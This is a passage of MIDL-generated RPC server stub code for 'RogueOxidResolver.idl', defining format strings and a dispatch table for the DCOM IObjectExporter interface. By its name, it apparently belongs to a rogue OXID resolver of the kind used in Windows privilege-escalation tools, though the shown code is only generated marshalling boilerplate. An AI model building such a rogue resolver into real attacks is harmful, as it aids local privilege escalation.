| /* 26 */ NdrFcShort( 0x0 ), /* 0 */ 134 | /* 28 */ NdrFcShort( 0x0 ), /* 0 */ 135 | 136 | /* Parameter pOxid */ 137 | 138 | /* 30 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ 139 | /* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 140 | /* 34 */ 0xb, /* FC_HYPER */ 141 | 0x0, /* 0 */ 142 | 143 | /* Parameter cRequestedProtseqs */ 144 | 145 | /* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 146 | /* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 147 | /* 40 */ 0x6, /* FC_SHORT */ 148 | 0x0, /* 0 */ 149 | 150 | /* Parameter arRequestedProtseqs */ 151 | 152 | /* 42 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 153 | /* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 154 | /* 46 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ 155 | 156 | /* Parameter ppdsaOxidBindings */ 157 | 158 | /* 48 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 159 | /* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 160 | /* 52 */ NdrFcShort( 0x12 ), /* Type Offset=18 */ 161 | 162 | /* Parameter pipidRemUnknown */ 163 | 164 | /* 54 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ 165 | /* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 166 | /* 58 */ NdrFcShort( 0x3a ), /* Type Offset=58 */ 167 | 168 | /* Parameter pAuthnHint */ 169 | 170 | /* 60 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 171 | /* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 172 | /* 64 */ 0x8, /* FC_LONG */ 173 | 0x0, /* 0 */ 174 | 175 | /* Return value */ 176 | 177 | /* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 178 | /* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 179 | /* 70 */ 0x10, /* FC_ERROR_STATUS_T */ 180 | 0x0, /* 0 */ 181 | 182 | /* Procedure SimplePing */ 183 | 184 | /* 72 */ 0x0, /* 0 */ 185 | 0x48, /* Old Flags: */ 186 | /* 74 */ NdrFcLong( 0x1 ), /* 1 */ 187 | /* 78 */ NdrFcShort( 0x1 ), /* 1 */ 188 | /* 80 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 189 | /* 82 */ 0x32, /* FC_BIND_PRIMITIVE */ 190 | 0x0, /* 0 */ 191 | /* 84 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 192 | /* 86 */ NdrFcShort( 0x24 ), /* 36 */ 193 | /* 88 */ NdrFcShort( 0x8 ), /* 8 */ 194 | /* 90 */ 0x44, /* Oi2 Flags: has return, has ext, */ 195 | 0x2, /* 2 */ 196 | /* 92 */ 0xa, /* 10 */ 197 | 0x1, /* Ext Flags: new corr desc, */ 198 | /* 94 */ NdrFcShort( 0x0 ), /* 0 */ 199 | /* 96 */ NdrFcShort( 0x0 ), /* 0 */ 200 | /* 98 */ NdrFcShort( 0x0 ), /* 0 */ 201 | /* 100 */ NdrFcShort( 0x0 ), /* 0 */ 202 | 203 | /* Parameter pSetId */ 204 | 205 | /* 102 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ 206 | /* 104 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 207 | /* 106 */ 0xb, /* FC_HYPER */ 208 | 0x0, /* 0 */ 209 | 210 | /* Return value */ 211 | 212 | /* 108 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 213 | /* 110 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 214 | /* 112 */ 0x10, /* FC_ERROR_STATUS_T */ 215 | 0x0, /* 0 */ 216 | 217 | /* Procedure ComplexPing */ 218 | 219 | /* 114 */ 0x0, /* 0 */ 220 | 0x48, /* Old Flags: */ 221 | /* 116 */ NdrFcLong( 0x1 ), /* 1 */ 222 | /* 120 */ NdrFcShort( 0x2 ), /* 2 */ 223 | /* 122 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ 224 | /* 124 */ 0x32, /* FC_BIND_PRIMITIVE */ 225 | 0x0, /* 0 */ 226 | /* 126 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 227 | /* 128 */ NdrFcShort( 0x36 ), /* 54 */ 228 | /* 130 */ NdrFcShort( 0x46 ), /* 70 */ 229 | /* 132 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 230 | 0x8, /* 8 */ 231 | /* 134 */ 0xa, /* 10 */ 232 | 0x5, /* Ext Flags: new corr desc, srv corr check, */ 233 | /* 136 */ NdrFcShort( 0x0 ), /* 0 */ 234 | /* 138 */ NdrFcShort( 0x1 ), /* 1 */ 235 | /* 140 */ NdrFcShort( 0x0 ), /* 0 */ 236 | /* 142 */ NdrFcShort( 0x0 ), /* 0 */ 237 | 238 | /* Parameter pSetId */ 239 | 240 | /* 144 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ 241 | /* 146 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 242 | /* 148 */ 0xb, /* FC_HYPER */ 243 | 0x0, /* 0 */ 244 | 245 | /* Parameter SequenceNum */ 246 | 247 | /* 150 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 248 | /* 152 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 249 | /* 154 */ 0x6, /* FC_SHORT */ 250 | 0x0, /* 0 */ 251 | 252 | /* Parameter cAddToSet */ 253 | 254 | /* 156 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 255 | /* 158 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 256 | /* 160 */ 0x6, /* FC_SHORT */ 257 | 0x0, /* 0 */ 258 | 259 | /* Parameter cDelFromSet */ 260 | 261 | /* 162 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 262 | /* 164 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 263 | /* 166 */ 0x6, /* FC_SHORT */ 264 | 0x0, /* 0 */ 265 | 266 | /* Parameter AddToSet */ 267 | 268 | /* 168 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 269 | /* 170 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 270 | /* 172 */ NdrFcShort( 0x4a ), /* Type Offset=74 */ 271 | 272 | /* Parameter DelFromSet */ 273 | 274 | /* 174 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 275 | /* 176 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 276 | /* 178 */ NdrFcShort( 0x5a ), /* Type Offset=90 */ 277 | 278 | /* Parameter pPingBackoffFactor */ 279 | 280 | /* 180 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 281 | /* 182 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 282 | /* 184 */ 0x6, /* FC_SHORT */ 283 | 0x0, /* 0 */ 284 | 285 | /* Return value */ 286 | 287 | /* 186 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 288 | /* 188 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 289 | /* 190 */ 0x10, /* FC_ERROR_STATUS_T */ 290 | 0x0, /* 0 */ 291 | 292 | /* Procedure ServerAlive */ 293 | 294 | /* 192 */ 0x0, /* 0 */ 295 | 0x48, /* Old Flags: */ 296 | /* 194 */ NdrFcLong( 0x1 ), /* 1 */ 297 | /* 198 */ NdrFcShort( 0x3 ), /* 3 */ 298 | /* 200 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 299 | /* 202 */ 0x32, /* FC_BIND_PRIMITIVE */ 300 | 0x0, /* 0 */ 301 | /* 204 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 302 | /* 206 */ NdrFcShort( 0x0 ), /* 0 */ 303 | /* 208 */ NdrFcShort( 0x8 ), /* 8 */ 304 | /* 210 */ 0x44, /* Oi2 Flags: has return, has ext, */ 305 | 0x1, /* 1 */ 306 | /* 212 */ 0xa, /* 10 */ 307 | 0x1, /* Ext Flags: new corr desc, */ 308 | /* 214 */ NdrFcShort( 0x0 ), /* 0 */ 309 | /* 216 */ NdrFcShort( 0x0 ), /* 0 */ 310 | /* 218 */ NdrFcShort( 0x0 ), /* 0 */ 311 | /* 220 */ NdrFcShort( 0x0 ), /* 0 */ 312 | 313 | /* Return value */ 314 | 315 | /* 222 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 316 | /* 224 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 317 | /* 226 */ 0x10, /* FC_ERROR_STATUS_T */ 318 | 0x0, /* 0 */ 319 | 320 | /* Procedure ResolveOxid2 */ 321 | 322 | /* 228 */ 0x0, /* 0 */ 323 | 0x48, /* Old Flags: */ 324 | /* 230 */ NdrFcLong( 0x1 ), /* 1 */ 325 | /* 234 */ NdrFcShort( 0x4 ), /* 4 */ 326 | /* 236 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ 327 | /* 238 */ 0x32, /* FC_BIND_PRIMITIVE */ 328 | 0x0, /* 0 */ 329 | /* 240 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 330 | /* 242 */ NdrFcShort( 0x2a ), /* 42 */ 331 | /* 244 */ NdrFcShort( 0x90 ), /* 144 */ 332 | /* 246 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ 333 | 0x8, /* 8 */ 334 | /* 248 */ 0xa, /* 10 */ 335 | 0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */ 336 | /* 250 */ NdrFcShort( 0x1 ), /* 1 */ 337 | /* 252 */ NdrFcShort( 0x1 ), /* 1 */ 338 | /* 254 */ NdrFcShort( 0x0 ), /* 0 */ 339 | /* 256 */ NdrFcShort( 0x0 ), /* 0 */ 340 | 341 | /* Parameter pOxid */ 342 | 343 | /* 258 */ NdrFcShort( 0x148 ), /* Flags: in, base type, simple ref, */ 344 | /* 260 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 345 | /* 262 */ 0xb, /* FC_HYPER */ 346 | 0x0, /* 0 */ 347 | 348 | /* Parameter cRequestedProtseqs */ 349 | 350 | /* 264 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ 351 | /* 266 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 352 | /* 268 */ 0x6, /* FC_SHORT */ 353 | 0x0, /* 0 */ 354 | 355 | /* Parameter arRequestedProtseqs */ 356 | 357 | /* 270 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ 358 | /* 272 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 359 | /* 274 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ 360 | 361 | /* Parameter ppdsaOxidBindings */ 362 | 363 | /* 276 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 364 | /* 278 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 365 | /* 280 */ NdrFcShort( 0x12 ), /* Type Offset=18 */ 366 | 367 | /* Parameter pipidRemUnknown */ 368 | 369 | /* 282 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ 370 | /* 284 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 371 | /* 286 */ NdrFcShort( 0x3a ), /* Type Offset=58 */ 372 | 373 | /* Parameter pAuthnHint */ 374 | 375 | /* 288 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 376 | /* 290 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ 377 | /* 292 */ 0x8, /* FC_LONG */ 378 | 0x0, /* 0 */ 379 | 380 | /* Parameter pComVersion */ 381 | 382 | /* 294 */ NdrFcShort( 0x2112 ), /* Flags: must free, out, simple ref, srv alloc size=8 */ 383 | /* 296 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ 384 | /* 298 */ NdrFcShort( 0x72 ), /* Type Offset=114 */ 385 | 386 | /* Return value */ 387 | 388 | /* 300 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 389 | /* 302 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ 390 | /* 304 */ 0x10, /* FC_ERROR_STATUS_T */ 391 | 0x0, /* 0 */ 392 | 393 | /* Procedure ServerAlive2 */ 394 | 395 | /* 306 */ 0x0, /* 0 */ 396 | 0x48, /* Old Flags: */ 397 | /* 308 */ NdrFcLong( 0x1 ), /* 1 */ 398 | /* 312 */ NdrFcShort( 0x5 ), /* 5 */ 399 | /* 314 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ 400 | /* 316 */ 0x32, /* FC_BIND_PRIMITIVE */ 401 | 0x0, /* 0 */ 402 | /* 318 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 403 | /* 320 */ NdrFcShort( 0x0 ), /* 0 */ 404 | /* 322 */ NdrFcShort( 0x4c ), /* 76 */ 405 | /* 324 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ 406 | 0x4, /* 4 */ 407 | /* 326 */ 0xa, /* 10 */ 408 | 0x3, /* Ext Flags: new corr desc, clt corr check, */ 409 | /* 328 */ NdrFcShort( 0x1 ), /* 1 */ 410 | /* 330 */ NdrFcShort( 0x0 ), /* 0 */ 411 | /* 332 */ NdrFcShort( 0x0 ), /* 0 */ 412 | /* 334 */ NdrFcShort( 0x0 ), /* 0 */ 413 | 414 | /* Parameter pComVersion */ 415 | 416 | /* 336 */ NdrFcShort( 0x2112 ), /* Flags: must free, out, simple ref, srv alloc size=8 */ 417 | /* 338 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 418 | /* 340 */ NdrFcShort( 0x72 ), /* Type Offset=114 */ 419 | 420 | /* Parameter ppdsaOrBindings */ 421 | 422 | /* 342 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 423 | /* 344 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 424 | /* 346 */ NdrFcShort( 0x12 ), /* Type Offset=18 */ 425 | 426 | /* Parameter pReserved */ 427 | 428 | /* 348 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ 429 | /* 350 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 430 | /* 352 */ 0x8, /* FC_LONG */ 431 | 0x0, /* 0 */ 432 | 433 | /* Return value */ 434 | 435 | /* 354 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ 436 | /* 356 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 437 | /* 358 */ 0x10, /* FC_ERROR_STATUS_T */ 438 | 0x0, /* 0 */ 439 | 440 | 0x0 441 | } 442 | }; 443 | 444 | static const RogueOxidResolver_MIDL_TYPE_FORMAT_STRING RogueOxidResolver__MIDL_TypeFormatString = 445 | { 446 | 0, 447 | { 448 | NdrFcShort( 0x0 ), /* 0 */ 449 | /* 2 */ 450 | 0x11, 0x8, /* FC_RP [simple_pointer] */ 451 | /* 4 */ 0xb, /* FC_HYPER */ 452 | 0x5c, /* FC_PAD */ 453 | /* 6 */ 454 | 0x1b, /* FC_CARRAY */ 455 | 0x1, /* 1 */ 456 | /* 8 */ NdrFcShort( 0x2 ), /* 2 */ 457 | /* 10 */ 0x27, /* Corr desc: parameter, FC_USHORT */ 458 | 0x0, /* */ 459 | /* 12 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 460 | /* 14 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 461 | /* 16 */ 0x6, /* FC_SHORT */ 462 | 0x5b, /* FC_END */ 463 | /* 18 */ 464 | 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ 465 | /* 20 */ NdrFcShort( 0x2 ), /* Offset= 2 (22) */ 466 | /* 22 */ 467 | 0x12, 0x0, /* FC_UP */ 468 | /* 24 */ NdrFcShort( 0xe ), /* Offset= 14 (38) */ 469 | /* 26 */ 470 | 0x1b, /* FC_CARRAY */ 471 | 0x1, /* 1 */ 472 | /* 28 */ NdrFcShort( 0x2 ), /* 2 */ 473 | /* 30 */ 0x7, /* Corr desc: FC_USHORT */ 474 | 0x0, /* */ 475 | /* 32 */ NdrFcShort( 0xfffc ), /* -4 */ 476 | /* 34 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 477 | /* 36 */ 0x6, /* FC_SHORT */ 478 | 0x5b, /* FC_END */ 479 | /* 38 */ 480 | 0x17, /* FC_CSTRUCT */ 481 | 0x1, /* 1 */ 482 | /* 40 */ NdrFcShort( 0x4 ), /* 4 */ 483 | /* 42 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (26) */ 484 | /* 44 */ 0x6, /* FC_SHORT */ 485 | 0x6, /* FC_SHORT */ 486 | /* 46 */ 0x5c, /* FC_PAD */ 487 | 0x5b, /* FC_END */ 488 | /* 48 */ 489 | 0x11, 0x4, /* FC_RP [alloced_on_stack] */ 490 | /* 50 */ NdrFcShort( 0x8 ), /* Offset= 8 (58) */ 491 | /* 52 */ 492 | 0x1d, /* FC_SMFARRAY */ 493 | 0x0, /* 0 */ 494 | /* 54 */ NdrFcShort( 0x8 ), /* 8 */ 495 | /* 56 */ 0x1, /* FC_BYTE */ 496 | 0x5b, /* FC_END */ 497 | /* 58 */ 498 | 0x15, /* FC_STRUCT */ 499 | 0x3, /* 3 */ 500 | /* 60 */ NdrFcShort( 0x10 ), /* 16 */ 501 | /* 62 */ 0x8, /* FC_LONG */ 502 | 0x6, /* FC_SHORT */ 503 | /* 64 */ 0x6, /* FC_SHORT */ 504 | 0x4c, /* FC_EMBEDDED_COMPLEX */ 505 | /* 66 */ 0x0, /* 0 */ 506 | NdrFcShort( 0xfff1 ), /* Offset= -15 (52) */ 507 | 0x5b, /* FC_END */ 508 | /* 70 */ 509 | 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ 510 | /* 72 */ 0x8, /* FC_LONG */ 511 | 0x5c, /* FC_PAD */ 512 | /* 74 */ 513 | 0x12, /* FC_UP */ 514 | 0x0, /* 0 */ 515 | /* 76 */ NdrFcShort( 0x2 ), /* Offset= 2 (78) */ 516 | /* 78 */ 517 | 0x1b, /* FC_CARRAY */ 518 | 0x7, /* 7 */ 519 | /* 80 */ NdrFcShort( 0x8 ), /* 8 */ 520 | /* 82 */ 0x27, /* Corr desc: parameter, FC_USHORT */ 521 | 0x0, /* */ 522 | /* 84 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ 523 | /* 86 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 524 | /* 88 */ 0xb, /* FC_HYPER */ 525 | 0x5b, /* FC_END */ 526 | /* 90 */ 527 | 0x12, /* FC_UP */ 528 | 0x0, /* 0 */ 529 | /* 92 */ NdrFcShort( 0x2 ), /* Offset= 2 (94) */ 530 | /* 94 */ 531 | 0x1b, /* FC_CARRAY */ 532 | 0x7, /* 7 */ 533 | /* 96 */ NdrFcShort( 0x8 ), /* 8 */ 534 | /* 98 */ 0x27, /* Corr desc: parameter, FC_USHORT */ 535 | 0x0, /* */ 536 | /* 100 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ 537 | /* 102 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ 538 | /* 104 */ 0xb, /* FC_HYPER */ 539 | 0x5b, /* FC_END */ 540 | /* 106 */ 541 | 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ 542 | /* 108 */ 0x6, /* FC_SHORT */ 543 | 0x5c, /* FC_PAD */ 544 | /* 110 */ 545 | 0x11, 0x4, /* FC_RP [alloced_on_stack] */ 546 | /* 112 */ NdrFcShort( 0x2 ), /* Offset= 2 (114) */ 547 | /* 114 */ 548 | 0x15, /* FC_STRUCT */ 549 | 0x1, /* 1 */ 550 | /* 116 */ NdrFcShort( 0x4 ), /* 4 */ 551 | /* 118 */ 0x6, /* FC_SHORT */ 552 | 0x6, /* FC_SHORT */ 553 | /* 120 */ 0x5c, /* FC_PAD */ 554 | 0x5b, /* FC_END */ 555 | 556 | 0x0 557 | } 558 | }; 559 | 560 | static const unsigned short IObjectExporter_FormatStringOffsetTable[] = 561 | { 562 | 0, 563 | 72, 564 | 114, 565 | 192, 566 | 228, 567 | 306 568 | }; 569 | 570 | 571 | static const RPC_DISPATCH_FUNCTION IObjectExporter_table[] = 572 | { 573 | NdrServerCall2, 574 | NdrServerCall2, 575 | NdrServerCall2, 576 | NdrServerCall2, 577 | NdrServerCall2, 578 | NdrServerCall2, 579 | 0 580 | }; 581 | static const RPC_DISPATCH_TABLE IObjectExporter_v0_0_DispatchTable = 582 | { 583 | 6, 584 | (RPC_DISPATCH_FUNCTION*)IObjectExporter_table 585 | }; 586 | 587 | 588 | #endif /* defined(_M_AMD64)*/ 589 | 590 | 591 | 592 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 593 | 594 | 595 | /* File created by MIDL compiler version 8.01.0622 */ 596 | /* at Tue Jan 19 04:14:07 2038 597 | */ 598 | /* Compiler settings for RogueOxidResolver.idl: 599 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 600 | protocol : all , ms_ext, c_ext, robust 601 | error checks: allocation ref bounds_check enum stub_data 602 | VC __declspec() decoration level: 603 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 604 | DECLSPEC_UUID(), MIDL_INTERFACE() 605 | */ 606 | /* @@MIDL_FILE_HEADING( ) */ 607 | 608 | #if defined(_M_AMD64) 609 | 610 | 611 | 612 | 613 | #if !defined(__RPC_WIN64__) 614 | #error Invalid build platform for this stub. 615 | #endif 616 | 617 | 618 | #include "ndr64types.h" 619 | #include "pshpack8.h" 620 | 621 | 622 | typedef 623 | NDR64_FORMAT_CHAR 624 | __midl_frag64_t; 625 | extern const __midl_frag64_t __midl_frag64; 626 | 627 | typedef 628 | NDR64_FORMAT_CHAR 629 | __midl_frag63_t; 630 | extern const __midl_frag63_t __midl_frag63; 631 | 632 | typedef 633 | struct _NDR64_POINTER_FORMAT 634 | __midl_frag62_t; 635 | extern const __midl_frag62_t __midl_frag62; 636 | 637 | typedef 638 | struct _NDR64_POINTER_FORMAT 639 | __midl_frag61_t; 640 | extern const __midl_frag61_t __midl_frag61; 641 | 642 | typedef 643 | struct _NDR64_POINTER_FORMAT 644 | __midl_frag60_t; 645 | extern const __midl_frag60_t __midl_frag60; 646 | 647 | typedef 648 | struct _NDR64_POINTER_FORMAT 649 | __midl_frag59_t; 650 | extern const __midl_frag59_t __midl_frag59; 651 | 652 | typedef 653 | struct 654 | { 655 | struct _NDR64_PROC_FORMAT frag1; 656 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 657 | struct _NDR64_PARAM_FORMAT frag3; 658 | struct _NDR64_PARAM_FORMAT frag4; 659 | struct _NDR64_PARAM_FORMAT frag5; 660 | struct _NDR64_PARAM_FORMAT frag6; 661 | } 662 | __midl_frag58_t; 663 | extern const __midl_frag58_t __midl_frag58; 664 | 665 | typedef 666 | struct 667 | { 668 | struct _NDR64_STRUCTURE_HEADER_FORMAT frag1; 669 | } 670 | __midl_frag56_t; 671 | extern const __midl_frag56_t __midl_frag56; 672 | 673 | typedef 674 | struct _NDR64_POINTER_FORMAT 675 | __midl_frag52_t; 676 | extern const __midl_frag52_t __midl_frag52; 677 | 678 | typedef 679 | NDR64_FORMAT_CHAR 680 | __midl_frag49_t; 681 | extern const __midl_frag49_t __midl_frag49; 682 | 683 | typedef 684 | struct 685 | { 686 | NDR64_FORMAT_UINT32 frag1; 687 | struct _NDR64_EXPR_VAR frag2; 688 | } 689 | __midl_frag48_t; 690 | extern const __midl_frag48_t __midl_frag48; 691 | 692 | typedef 693 | struct 694 | { 695 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 696 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 697 | } 698 | __midl_frag47_t; 699 | extern const __midl_frag47_t __midl_frag47; 700 | 701 | typedef 702 | NDR64_FORMAT_CHAR 703 | __midl_frag45_t; 704 | extern const __midl_frag45_t __midl_frag45; 705 | 706 | typedef 707 | struct _NDR64_POINTER_FORMAT 708 | __midl_frag44_t; 709 | extern const __midl_frag44_t __midl_frag44; 710 | 711 | typedef 712 | struct 713 | { 714 | struct _NDR64_PROC_FORMAT frag1; 715 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 716 | struct _NDR64_PARAM_FORMAT frag3; 717 | struct _NDR64_PARAM_FORMAT frag4; 718 | struct _NDR64_PARAM_FORMAT frag5; 719 | struct _NDR64_PARAM_FORMAT frag6; 720 | struct _NDR64_PARAM_FORMAT frag7; 721 | struct _NDR64_PARAM_FORMAT frag8; 722 | struct _NDR64_PARAM_FORMAT frag9; 723 | struct _NDR64_PARAM_FORMAT frag10; 724 | } 725 | __midl_frag43_t; 726 | extern const __midl_frag43_t __midl_frag43; 727 | 728 | typedef 729 | struct 730 | { 731 | struct _NDR64_PROC_FORMAT frag1; 732 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 733 | struct _NDR64_PARAM_FORMAT frag3; 734 | } 735 | __midl_frag41_t; 736 | extern const __midl_frag41_t __midl_frag41; 737 | 738 | typedef 739 | struct _NDR64_POINTER_FORMAT 740 | __midl_frag38_t; 741 | extern const __midl_frag38_t __midl_frag38; 742 | 743 | typedef 744 | struct 745 | { 746 | NDR64_FORMAT_UINT32 frag1; 747 | struct _NDR64_EXPR_VAR frag2; 748 | } 749 | __midl_frag36_t; 750 | extern const __midl_frag36_t __midl_frag36; 751 | 752 | typedef 753 | struct 754 | { 755 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 756 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 757 | } 758 | __midl_frag35_t; 759 | extern const __midl_frag35_t __midl_frag35; 760 | 761 | typedef 762 | struct _NDR64_POINTER_FORMAT 763 | __midl_frag34_t; 764 | extern const __midl_frag34_t __midl_frag34; 765 | 766 | typedef 767 | struct 768 | { 769 | NDR64_FORMAT_UINT32 frag1; 770 | struct _NDR64_EXPR_VAR frag2; 771 | } 772 | __midl_frag32_t; 773 | extern const __midl_frag32_t __midl_frag32; 774 | 775 | typedef 776 | struct 777 | { 778 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 779 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 780 | } 781 | __midl_frag31_t; 782 | extern const __midl_frag31_t __midl_frag31; 783 | 784 | typedef 785 | struct _NDR64_POINTER_FORMAT 786 | __midl_frag30_t; 787 | extern const __midl_frag30_t __midl_frag30; 788 | 789 | typedef 790 | struct 791 | { 792 | struct _NDR64_PROC_FORMAT frag1; 793 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 794 | struct _NDR64_PARAM_FORMAT frag3; 795 | struct _NDR64_PARAM_FORMAT frag4; 796 | struct _NDR64_PARAM_FORMAT frag5; 797 | struct _NDR64_PARAM_FORMAT frag6; 798 | struct _NDR64_PARAM_FORMAT frag7; 799 | struct _NDR64_PARAM_FORMAT frag8; 800 | struct _NDR64_PARAM_FORMAT frag9; 801 | struct _NDR64_PARAM_FORMAT frag10; 802 | } 803 | __midl_frag24_t; 804 | extern const __midl_frag24_t __midl_frag24; 805 | 806 | typedef 807 | struct 808 | { 809 | struct _NDR64_PROC_FORMAT frag1; 810 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 811 | struct _NDR64_PARAM_FORMAT frag3; 812 | struct _NDR64_PARAM_FORMAT frag4; 813 | } 814 | __midl_frag20_t; 815 | extern const __midl_frag20_t __midl_frag20; 816 | 817 | typedef 818 | struct 819 | { 820 | struct _NDR64_STRUCTURE_HEADER_FORMAT frag1; 821 | } 822 | __midl_frag16_t; 823 | extern const __midl_frag16_t __midl_frag16; 824 | 825 | typedef 826 | struct 827 | { 828 | NDR64_FORMAT_UINT32 frag1; 829 | struct _NDR64_EXPR_VAR frag2; 830 | } 831 | __midl_frag13_t; 832 | extern const __midl_frag13_t __midl_frag13; 833 | 834 | typedef 835 | struct 836 | { 837 | struct _NDR64_CONF_ARRAY_HEADER_FORMAT frag1; 838 | struct _NDR64_ARRAY_ELEMENT_INFO frag2; 839 | } 840 | __midl_frag12_t; 841 | extern const __midl_frag12_t __midl_frag12; 842 | 843 | typedef 844 | struct 845 | { 846 | struct _NDR64_CONF_STRUCTURE_HEADER_FORMAT frag1; 847 | } 848 | __midl_frag11_t; 849 | extern const __midl_frag11_t __midl_frag11; 850 | 851 | typedef 852 | struct 853 | { 854 | struct _NDR64_PROC_FORMAT frag1; 855 | struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2; 856 | struct _NDR64_PARAM_FORMAT frag3; 857 | struct _NDR64_PARAM_FORMAT frag4; 858 | struct _NDR64_PARAM_FORMAT frag5; 859 | struct _NDR64_PARAM_FORMAT frag6; 860 | struct _NDR64_PARAM_FORMAT frag7; 861 | struct _NDR64_PARAM_FORMAT frag8; 862 | struct _NDR64_PARAM_FORMAT frag9; 863 | } 864 | __midl_frag2_t; 865 | extern const __midl_frag2_t __midl_frag2; 866 | 867 | typedef 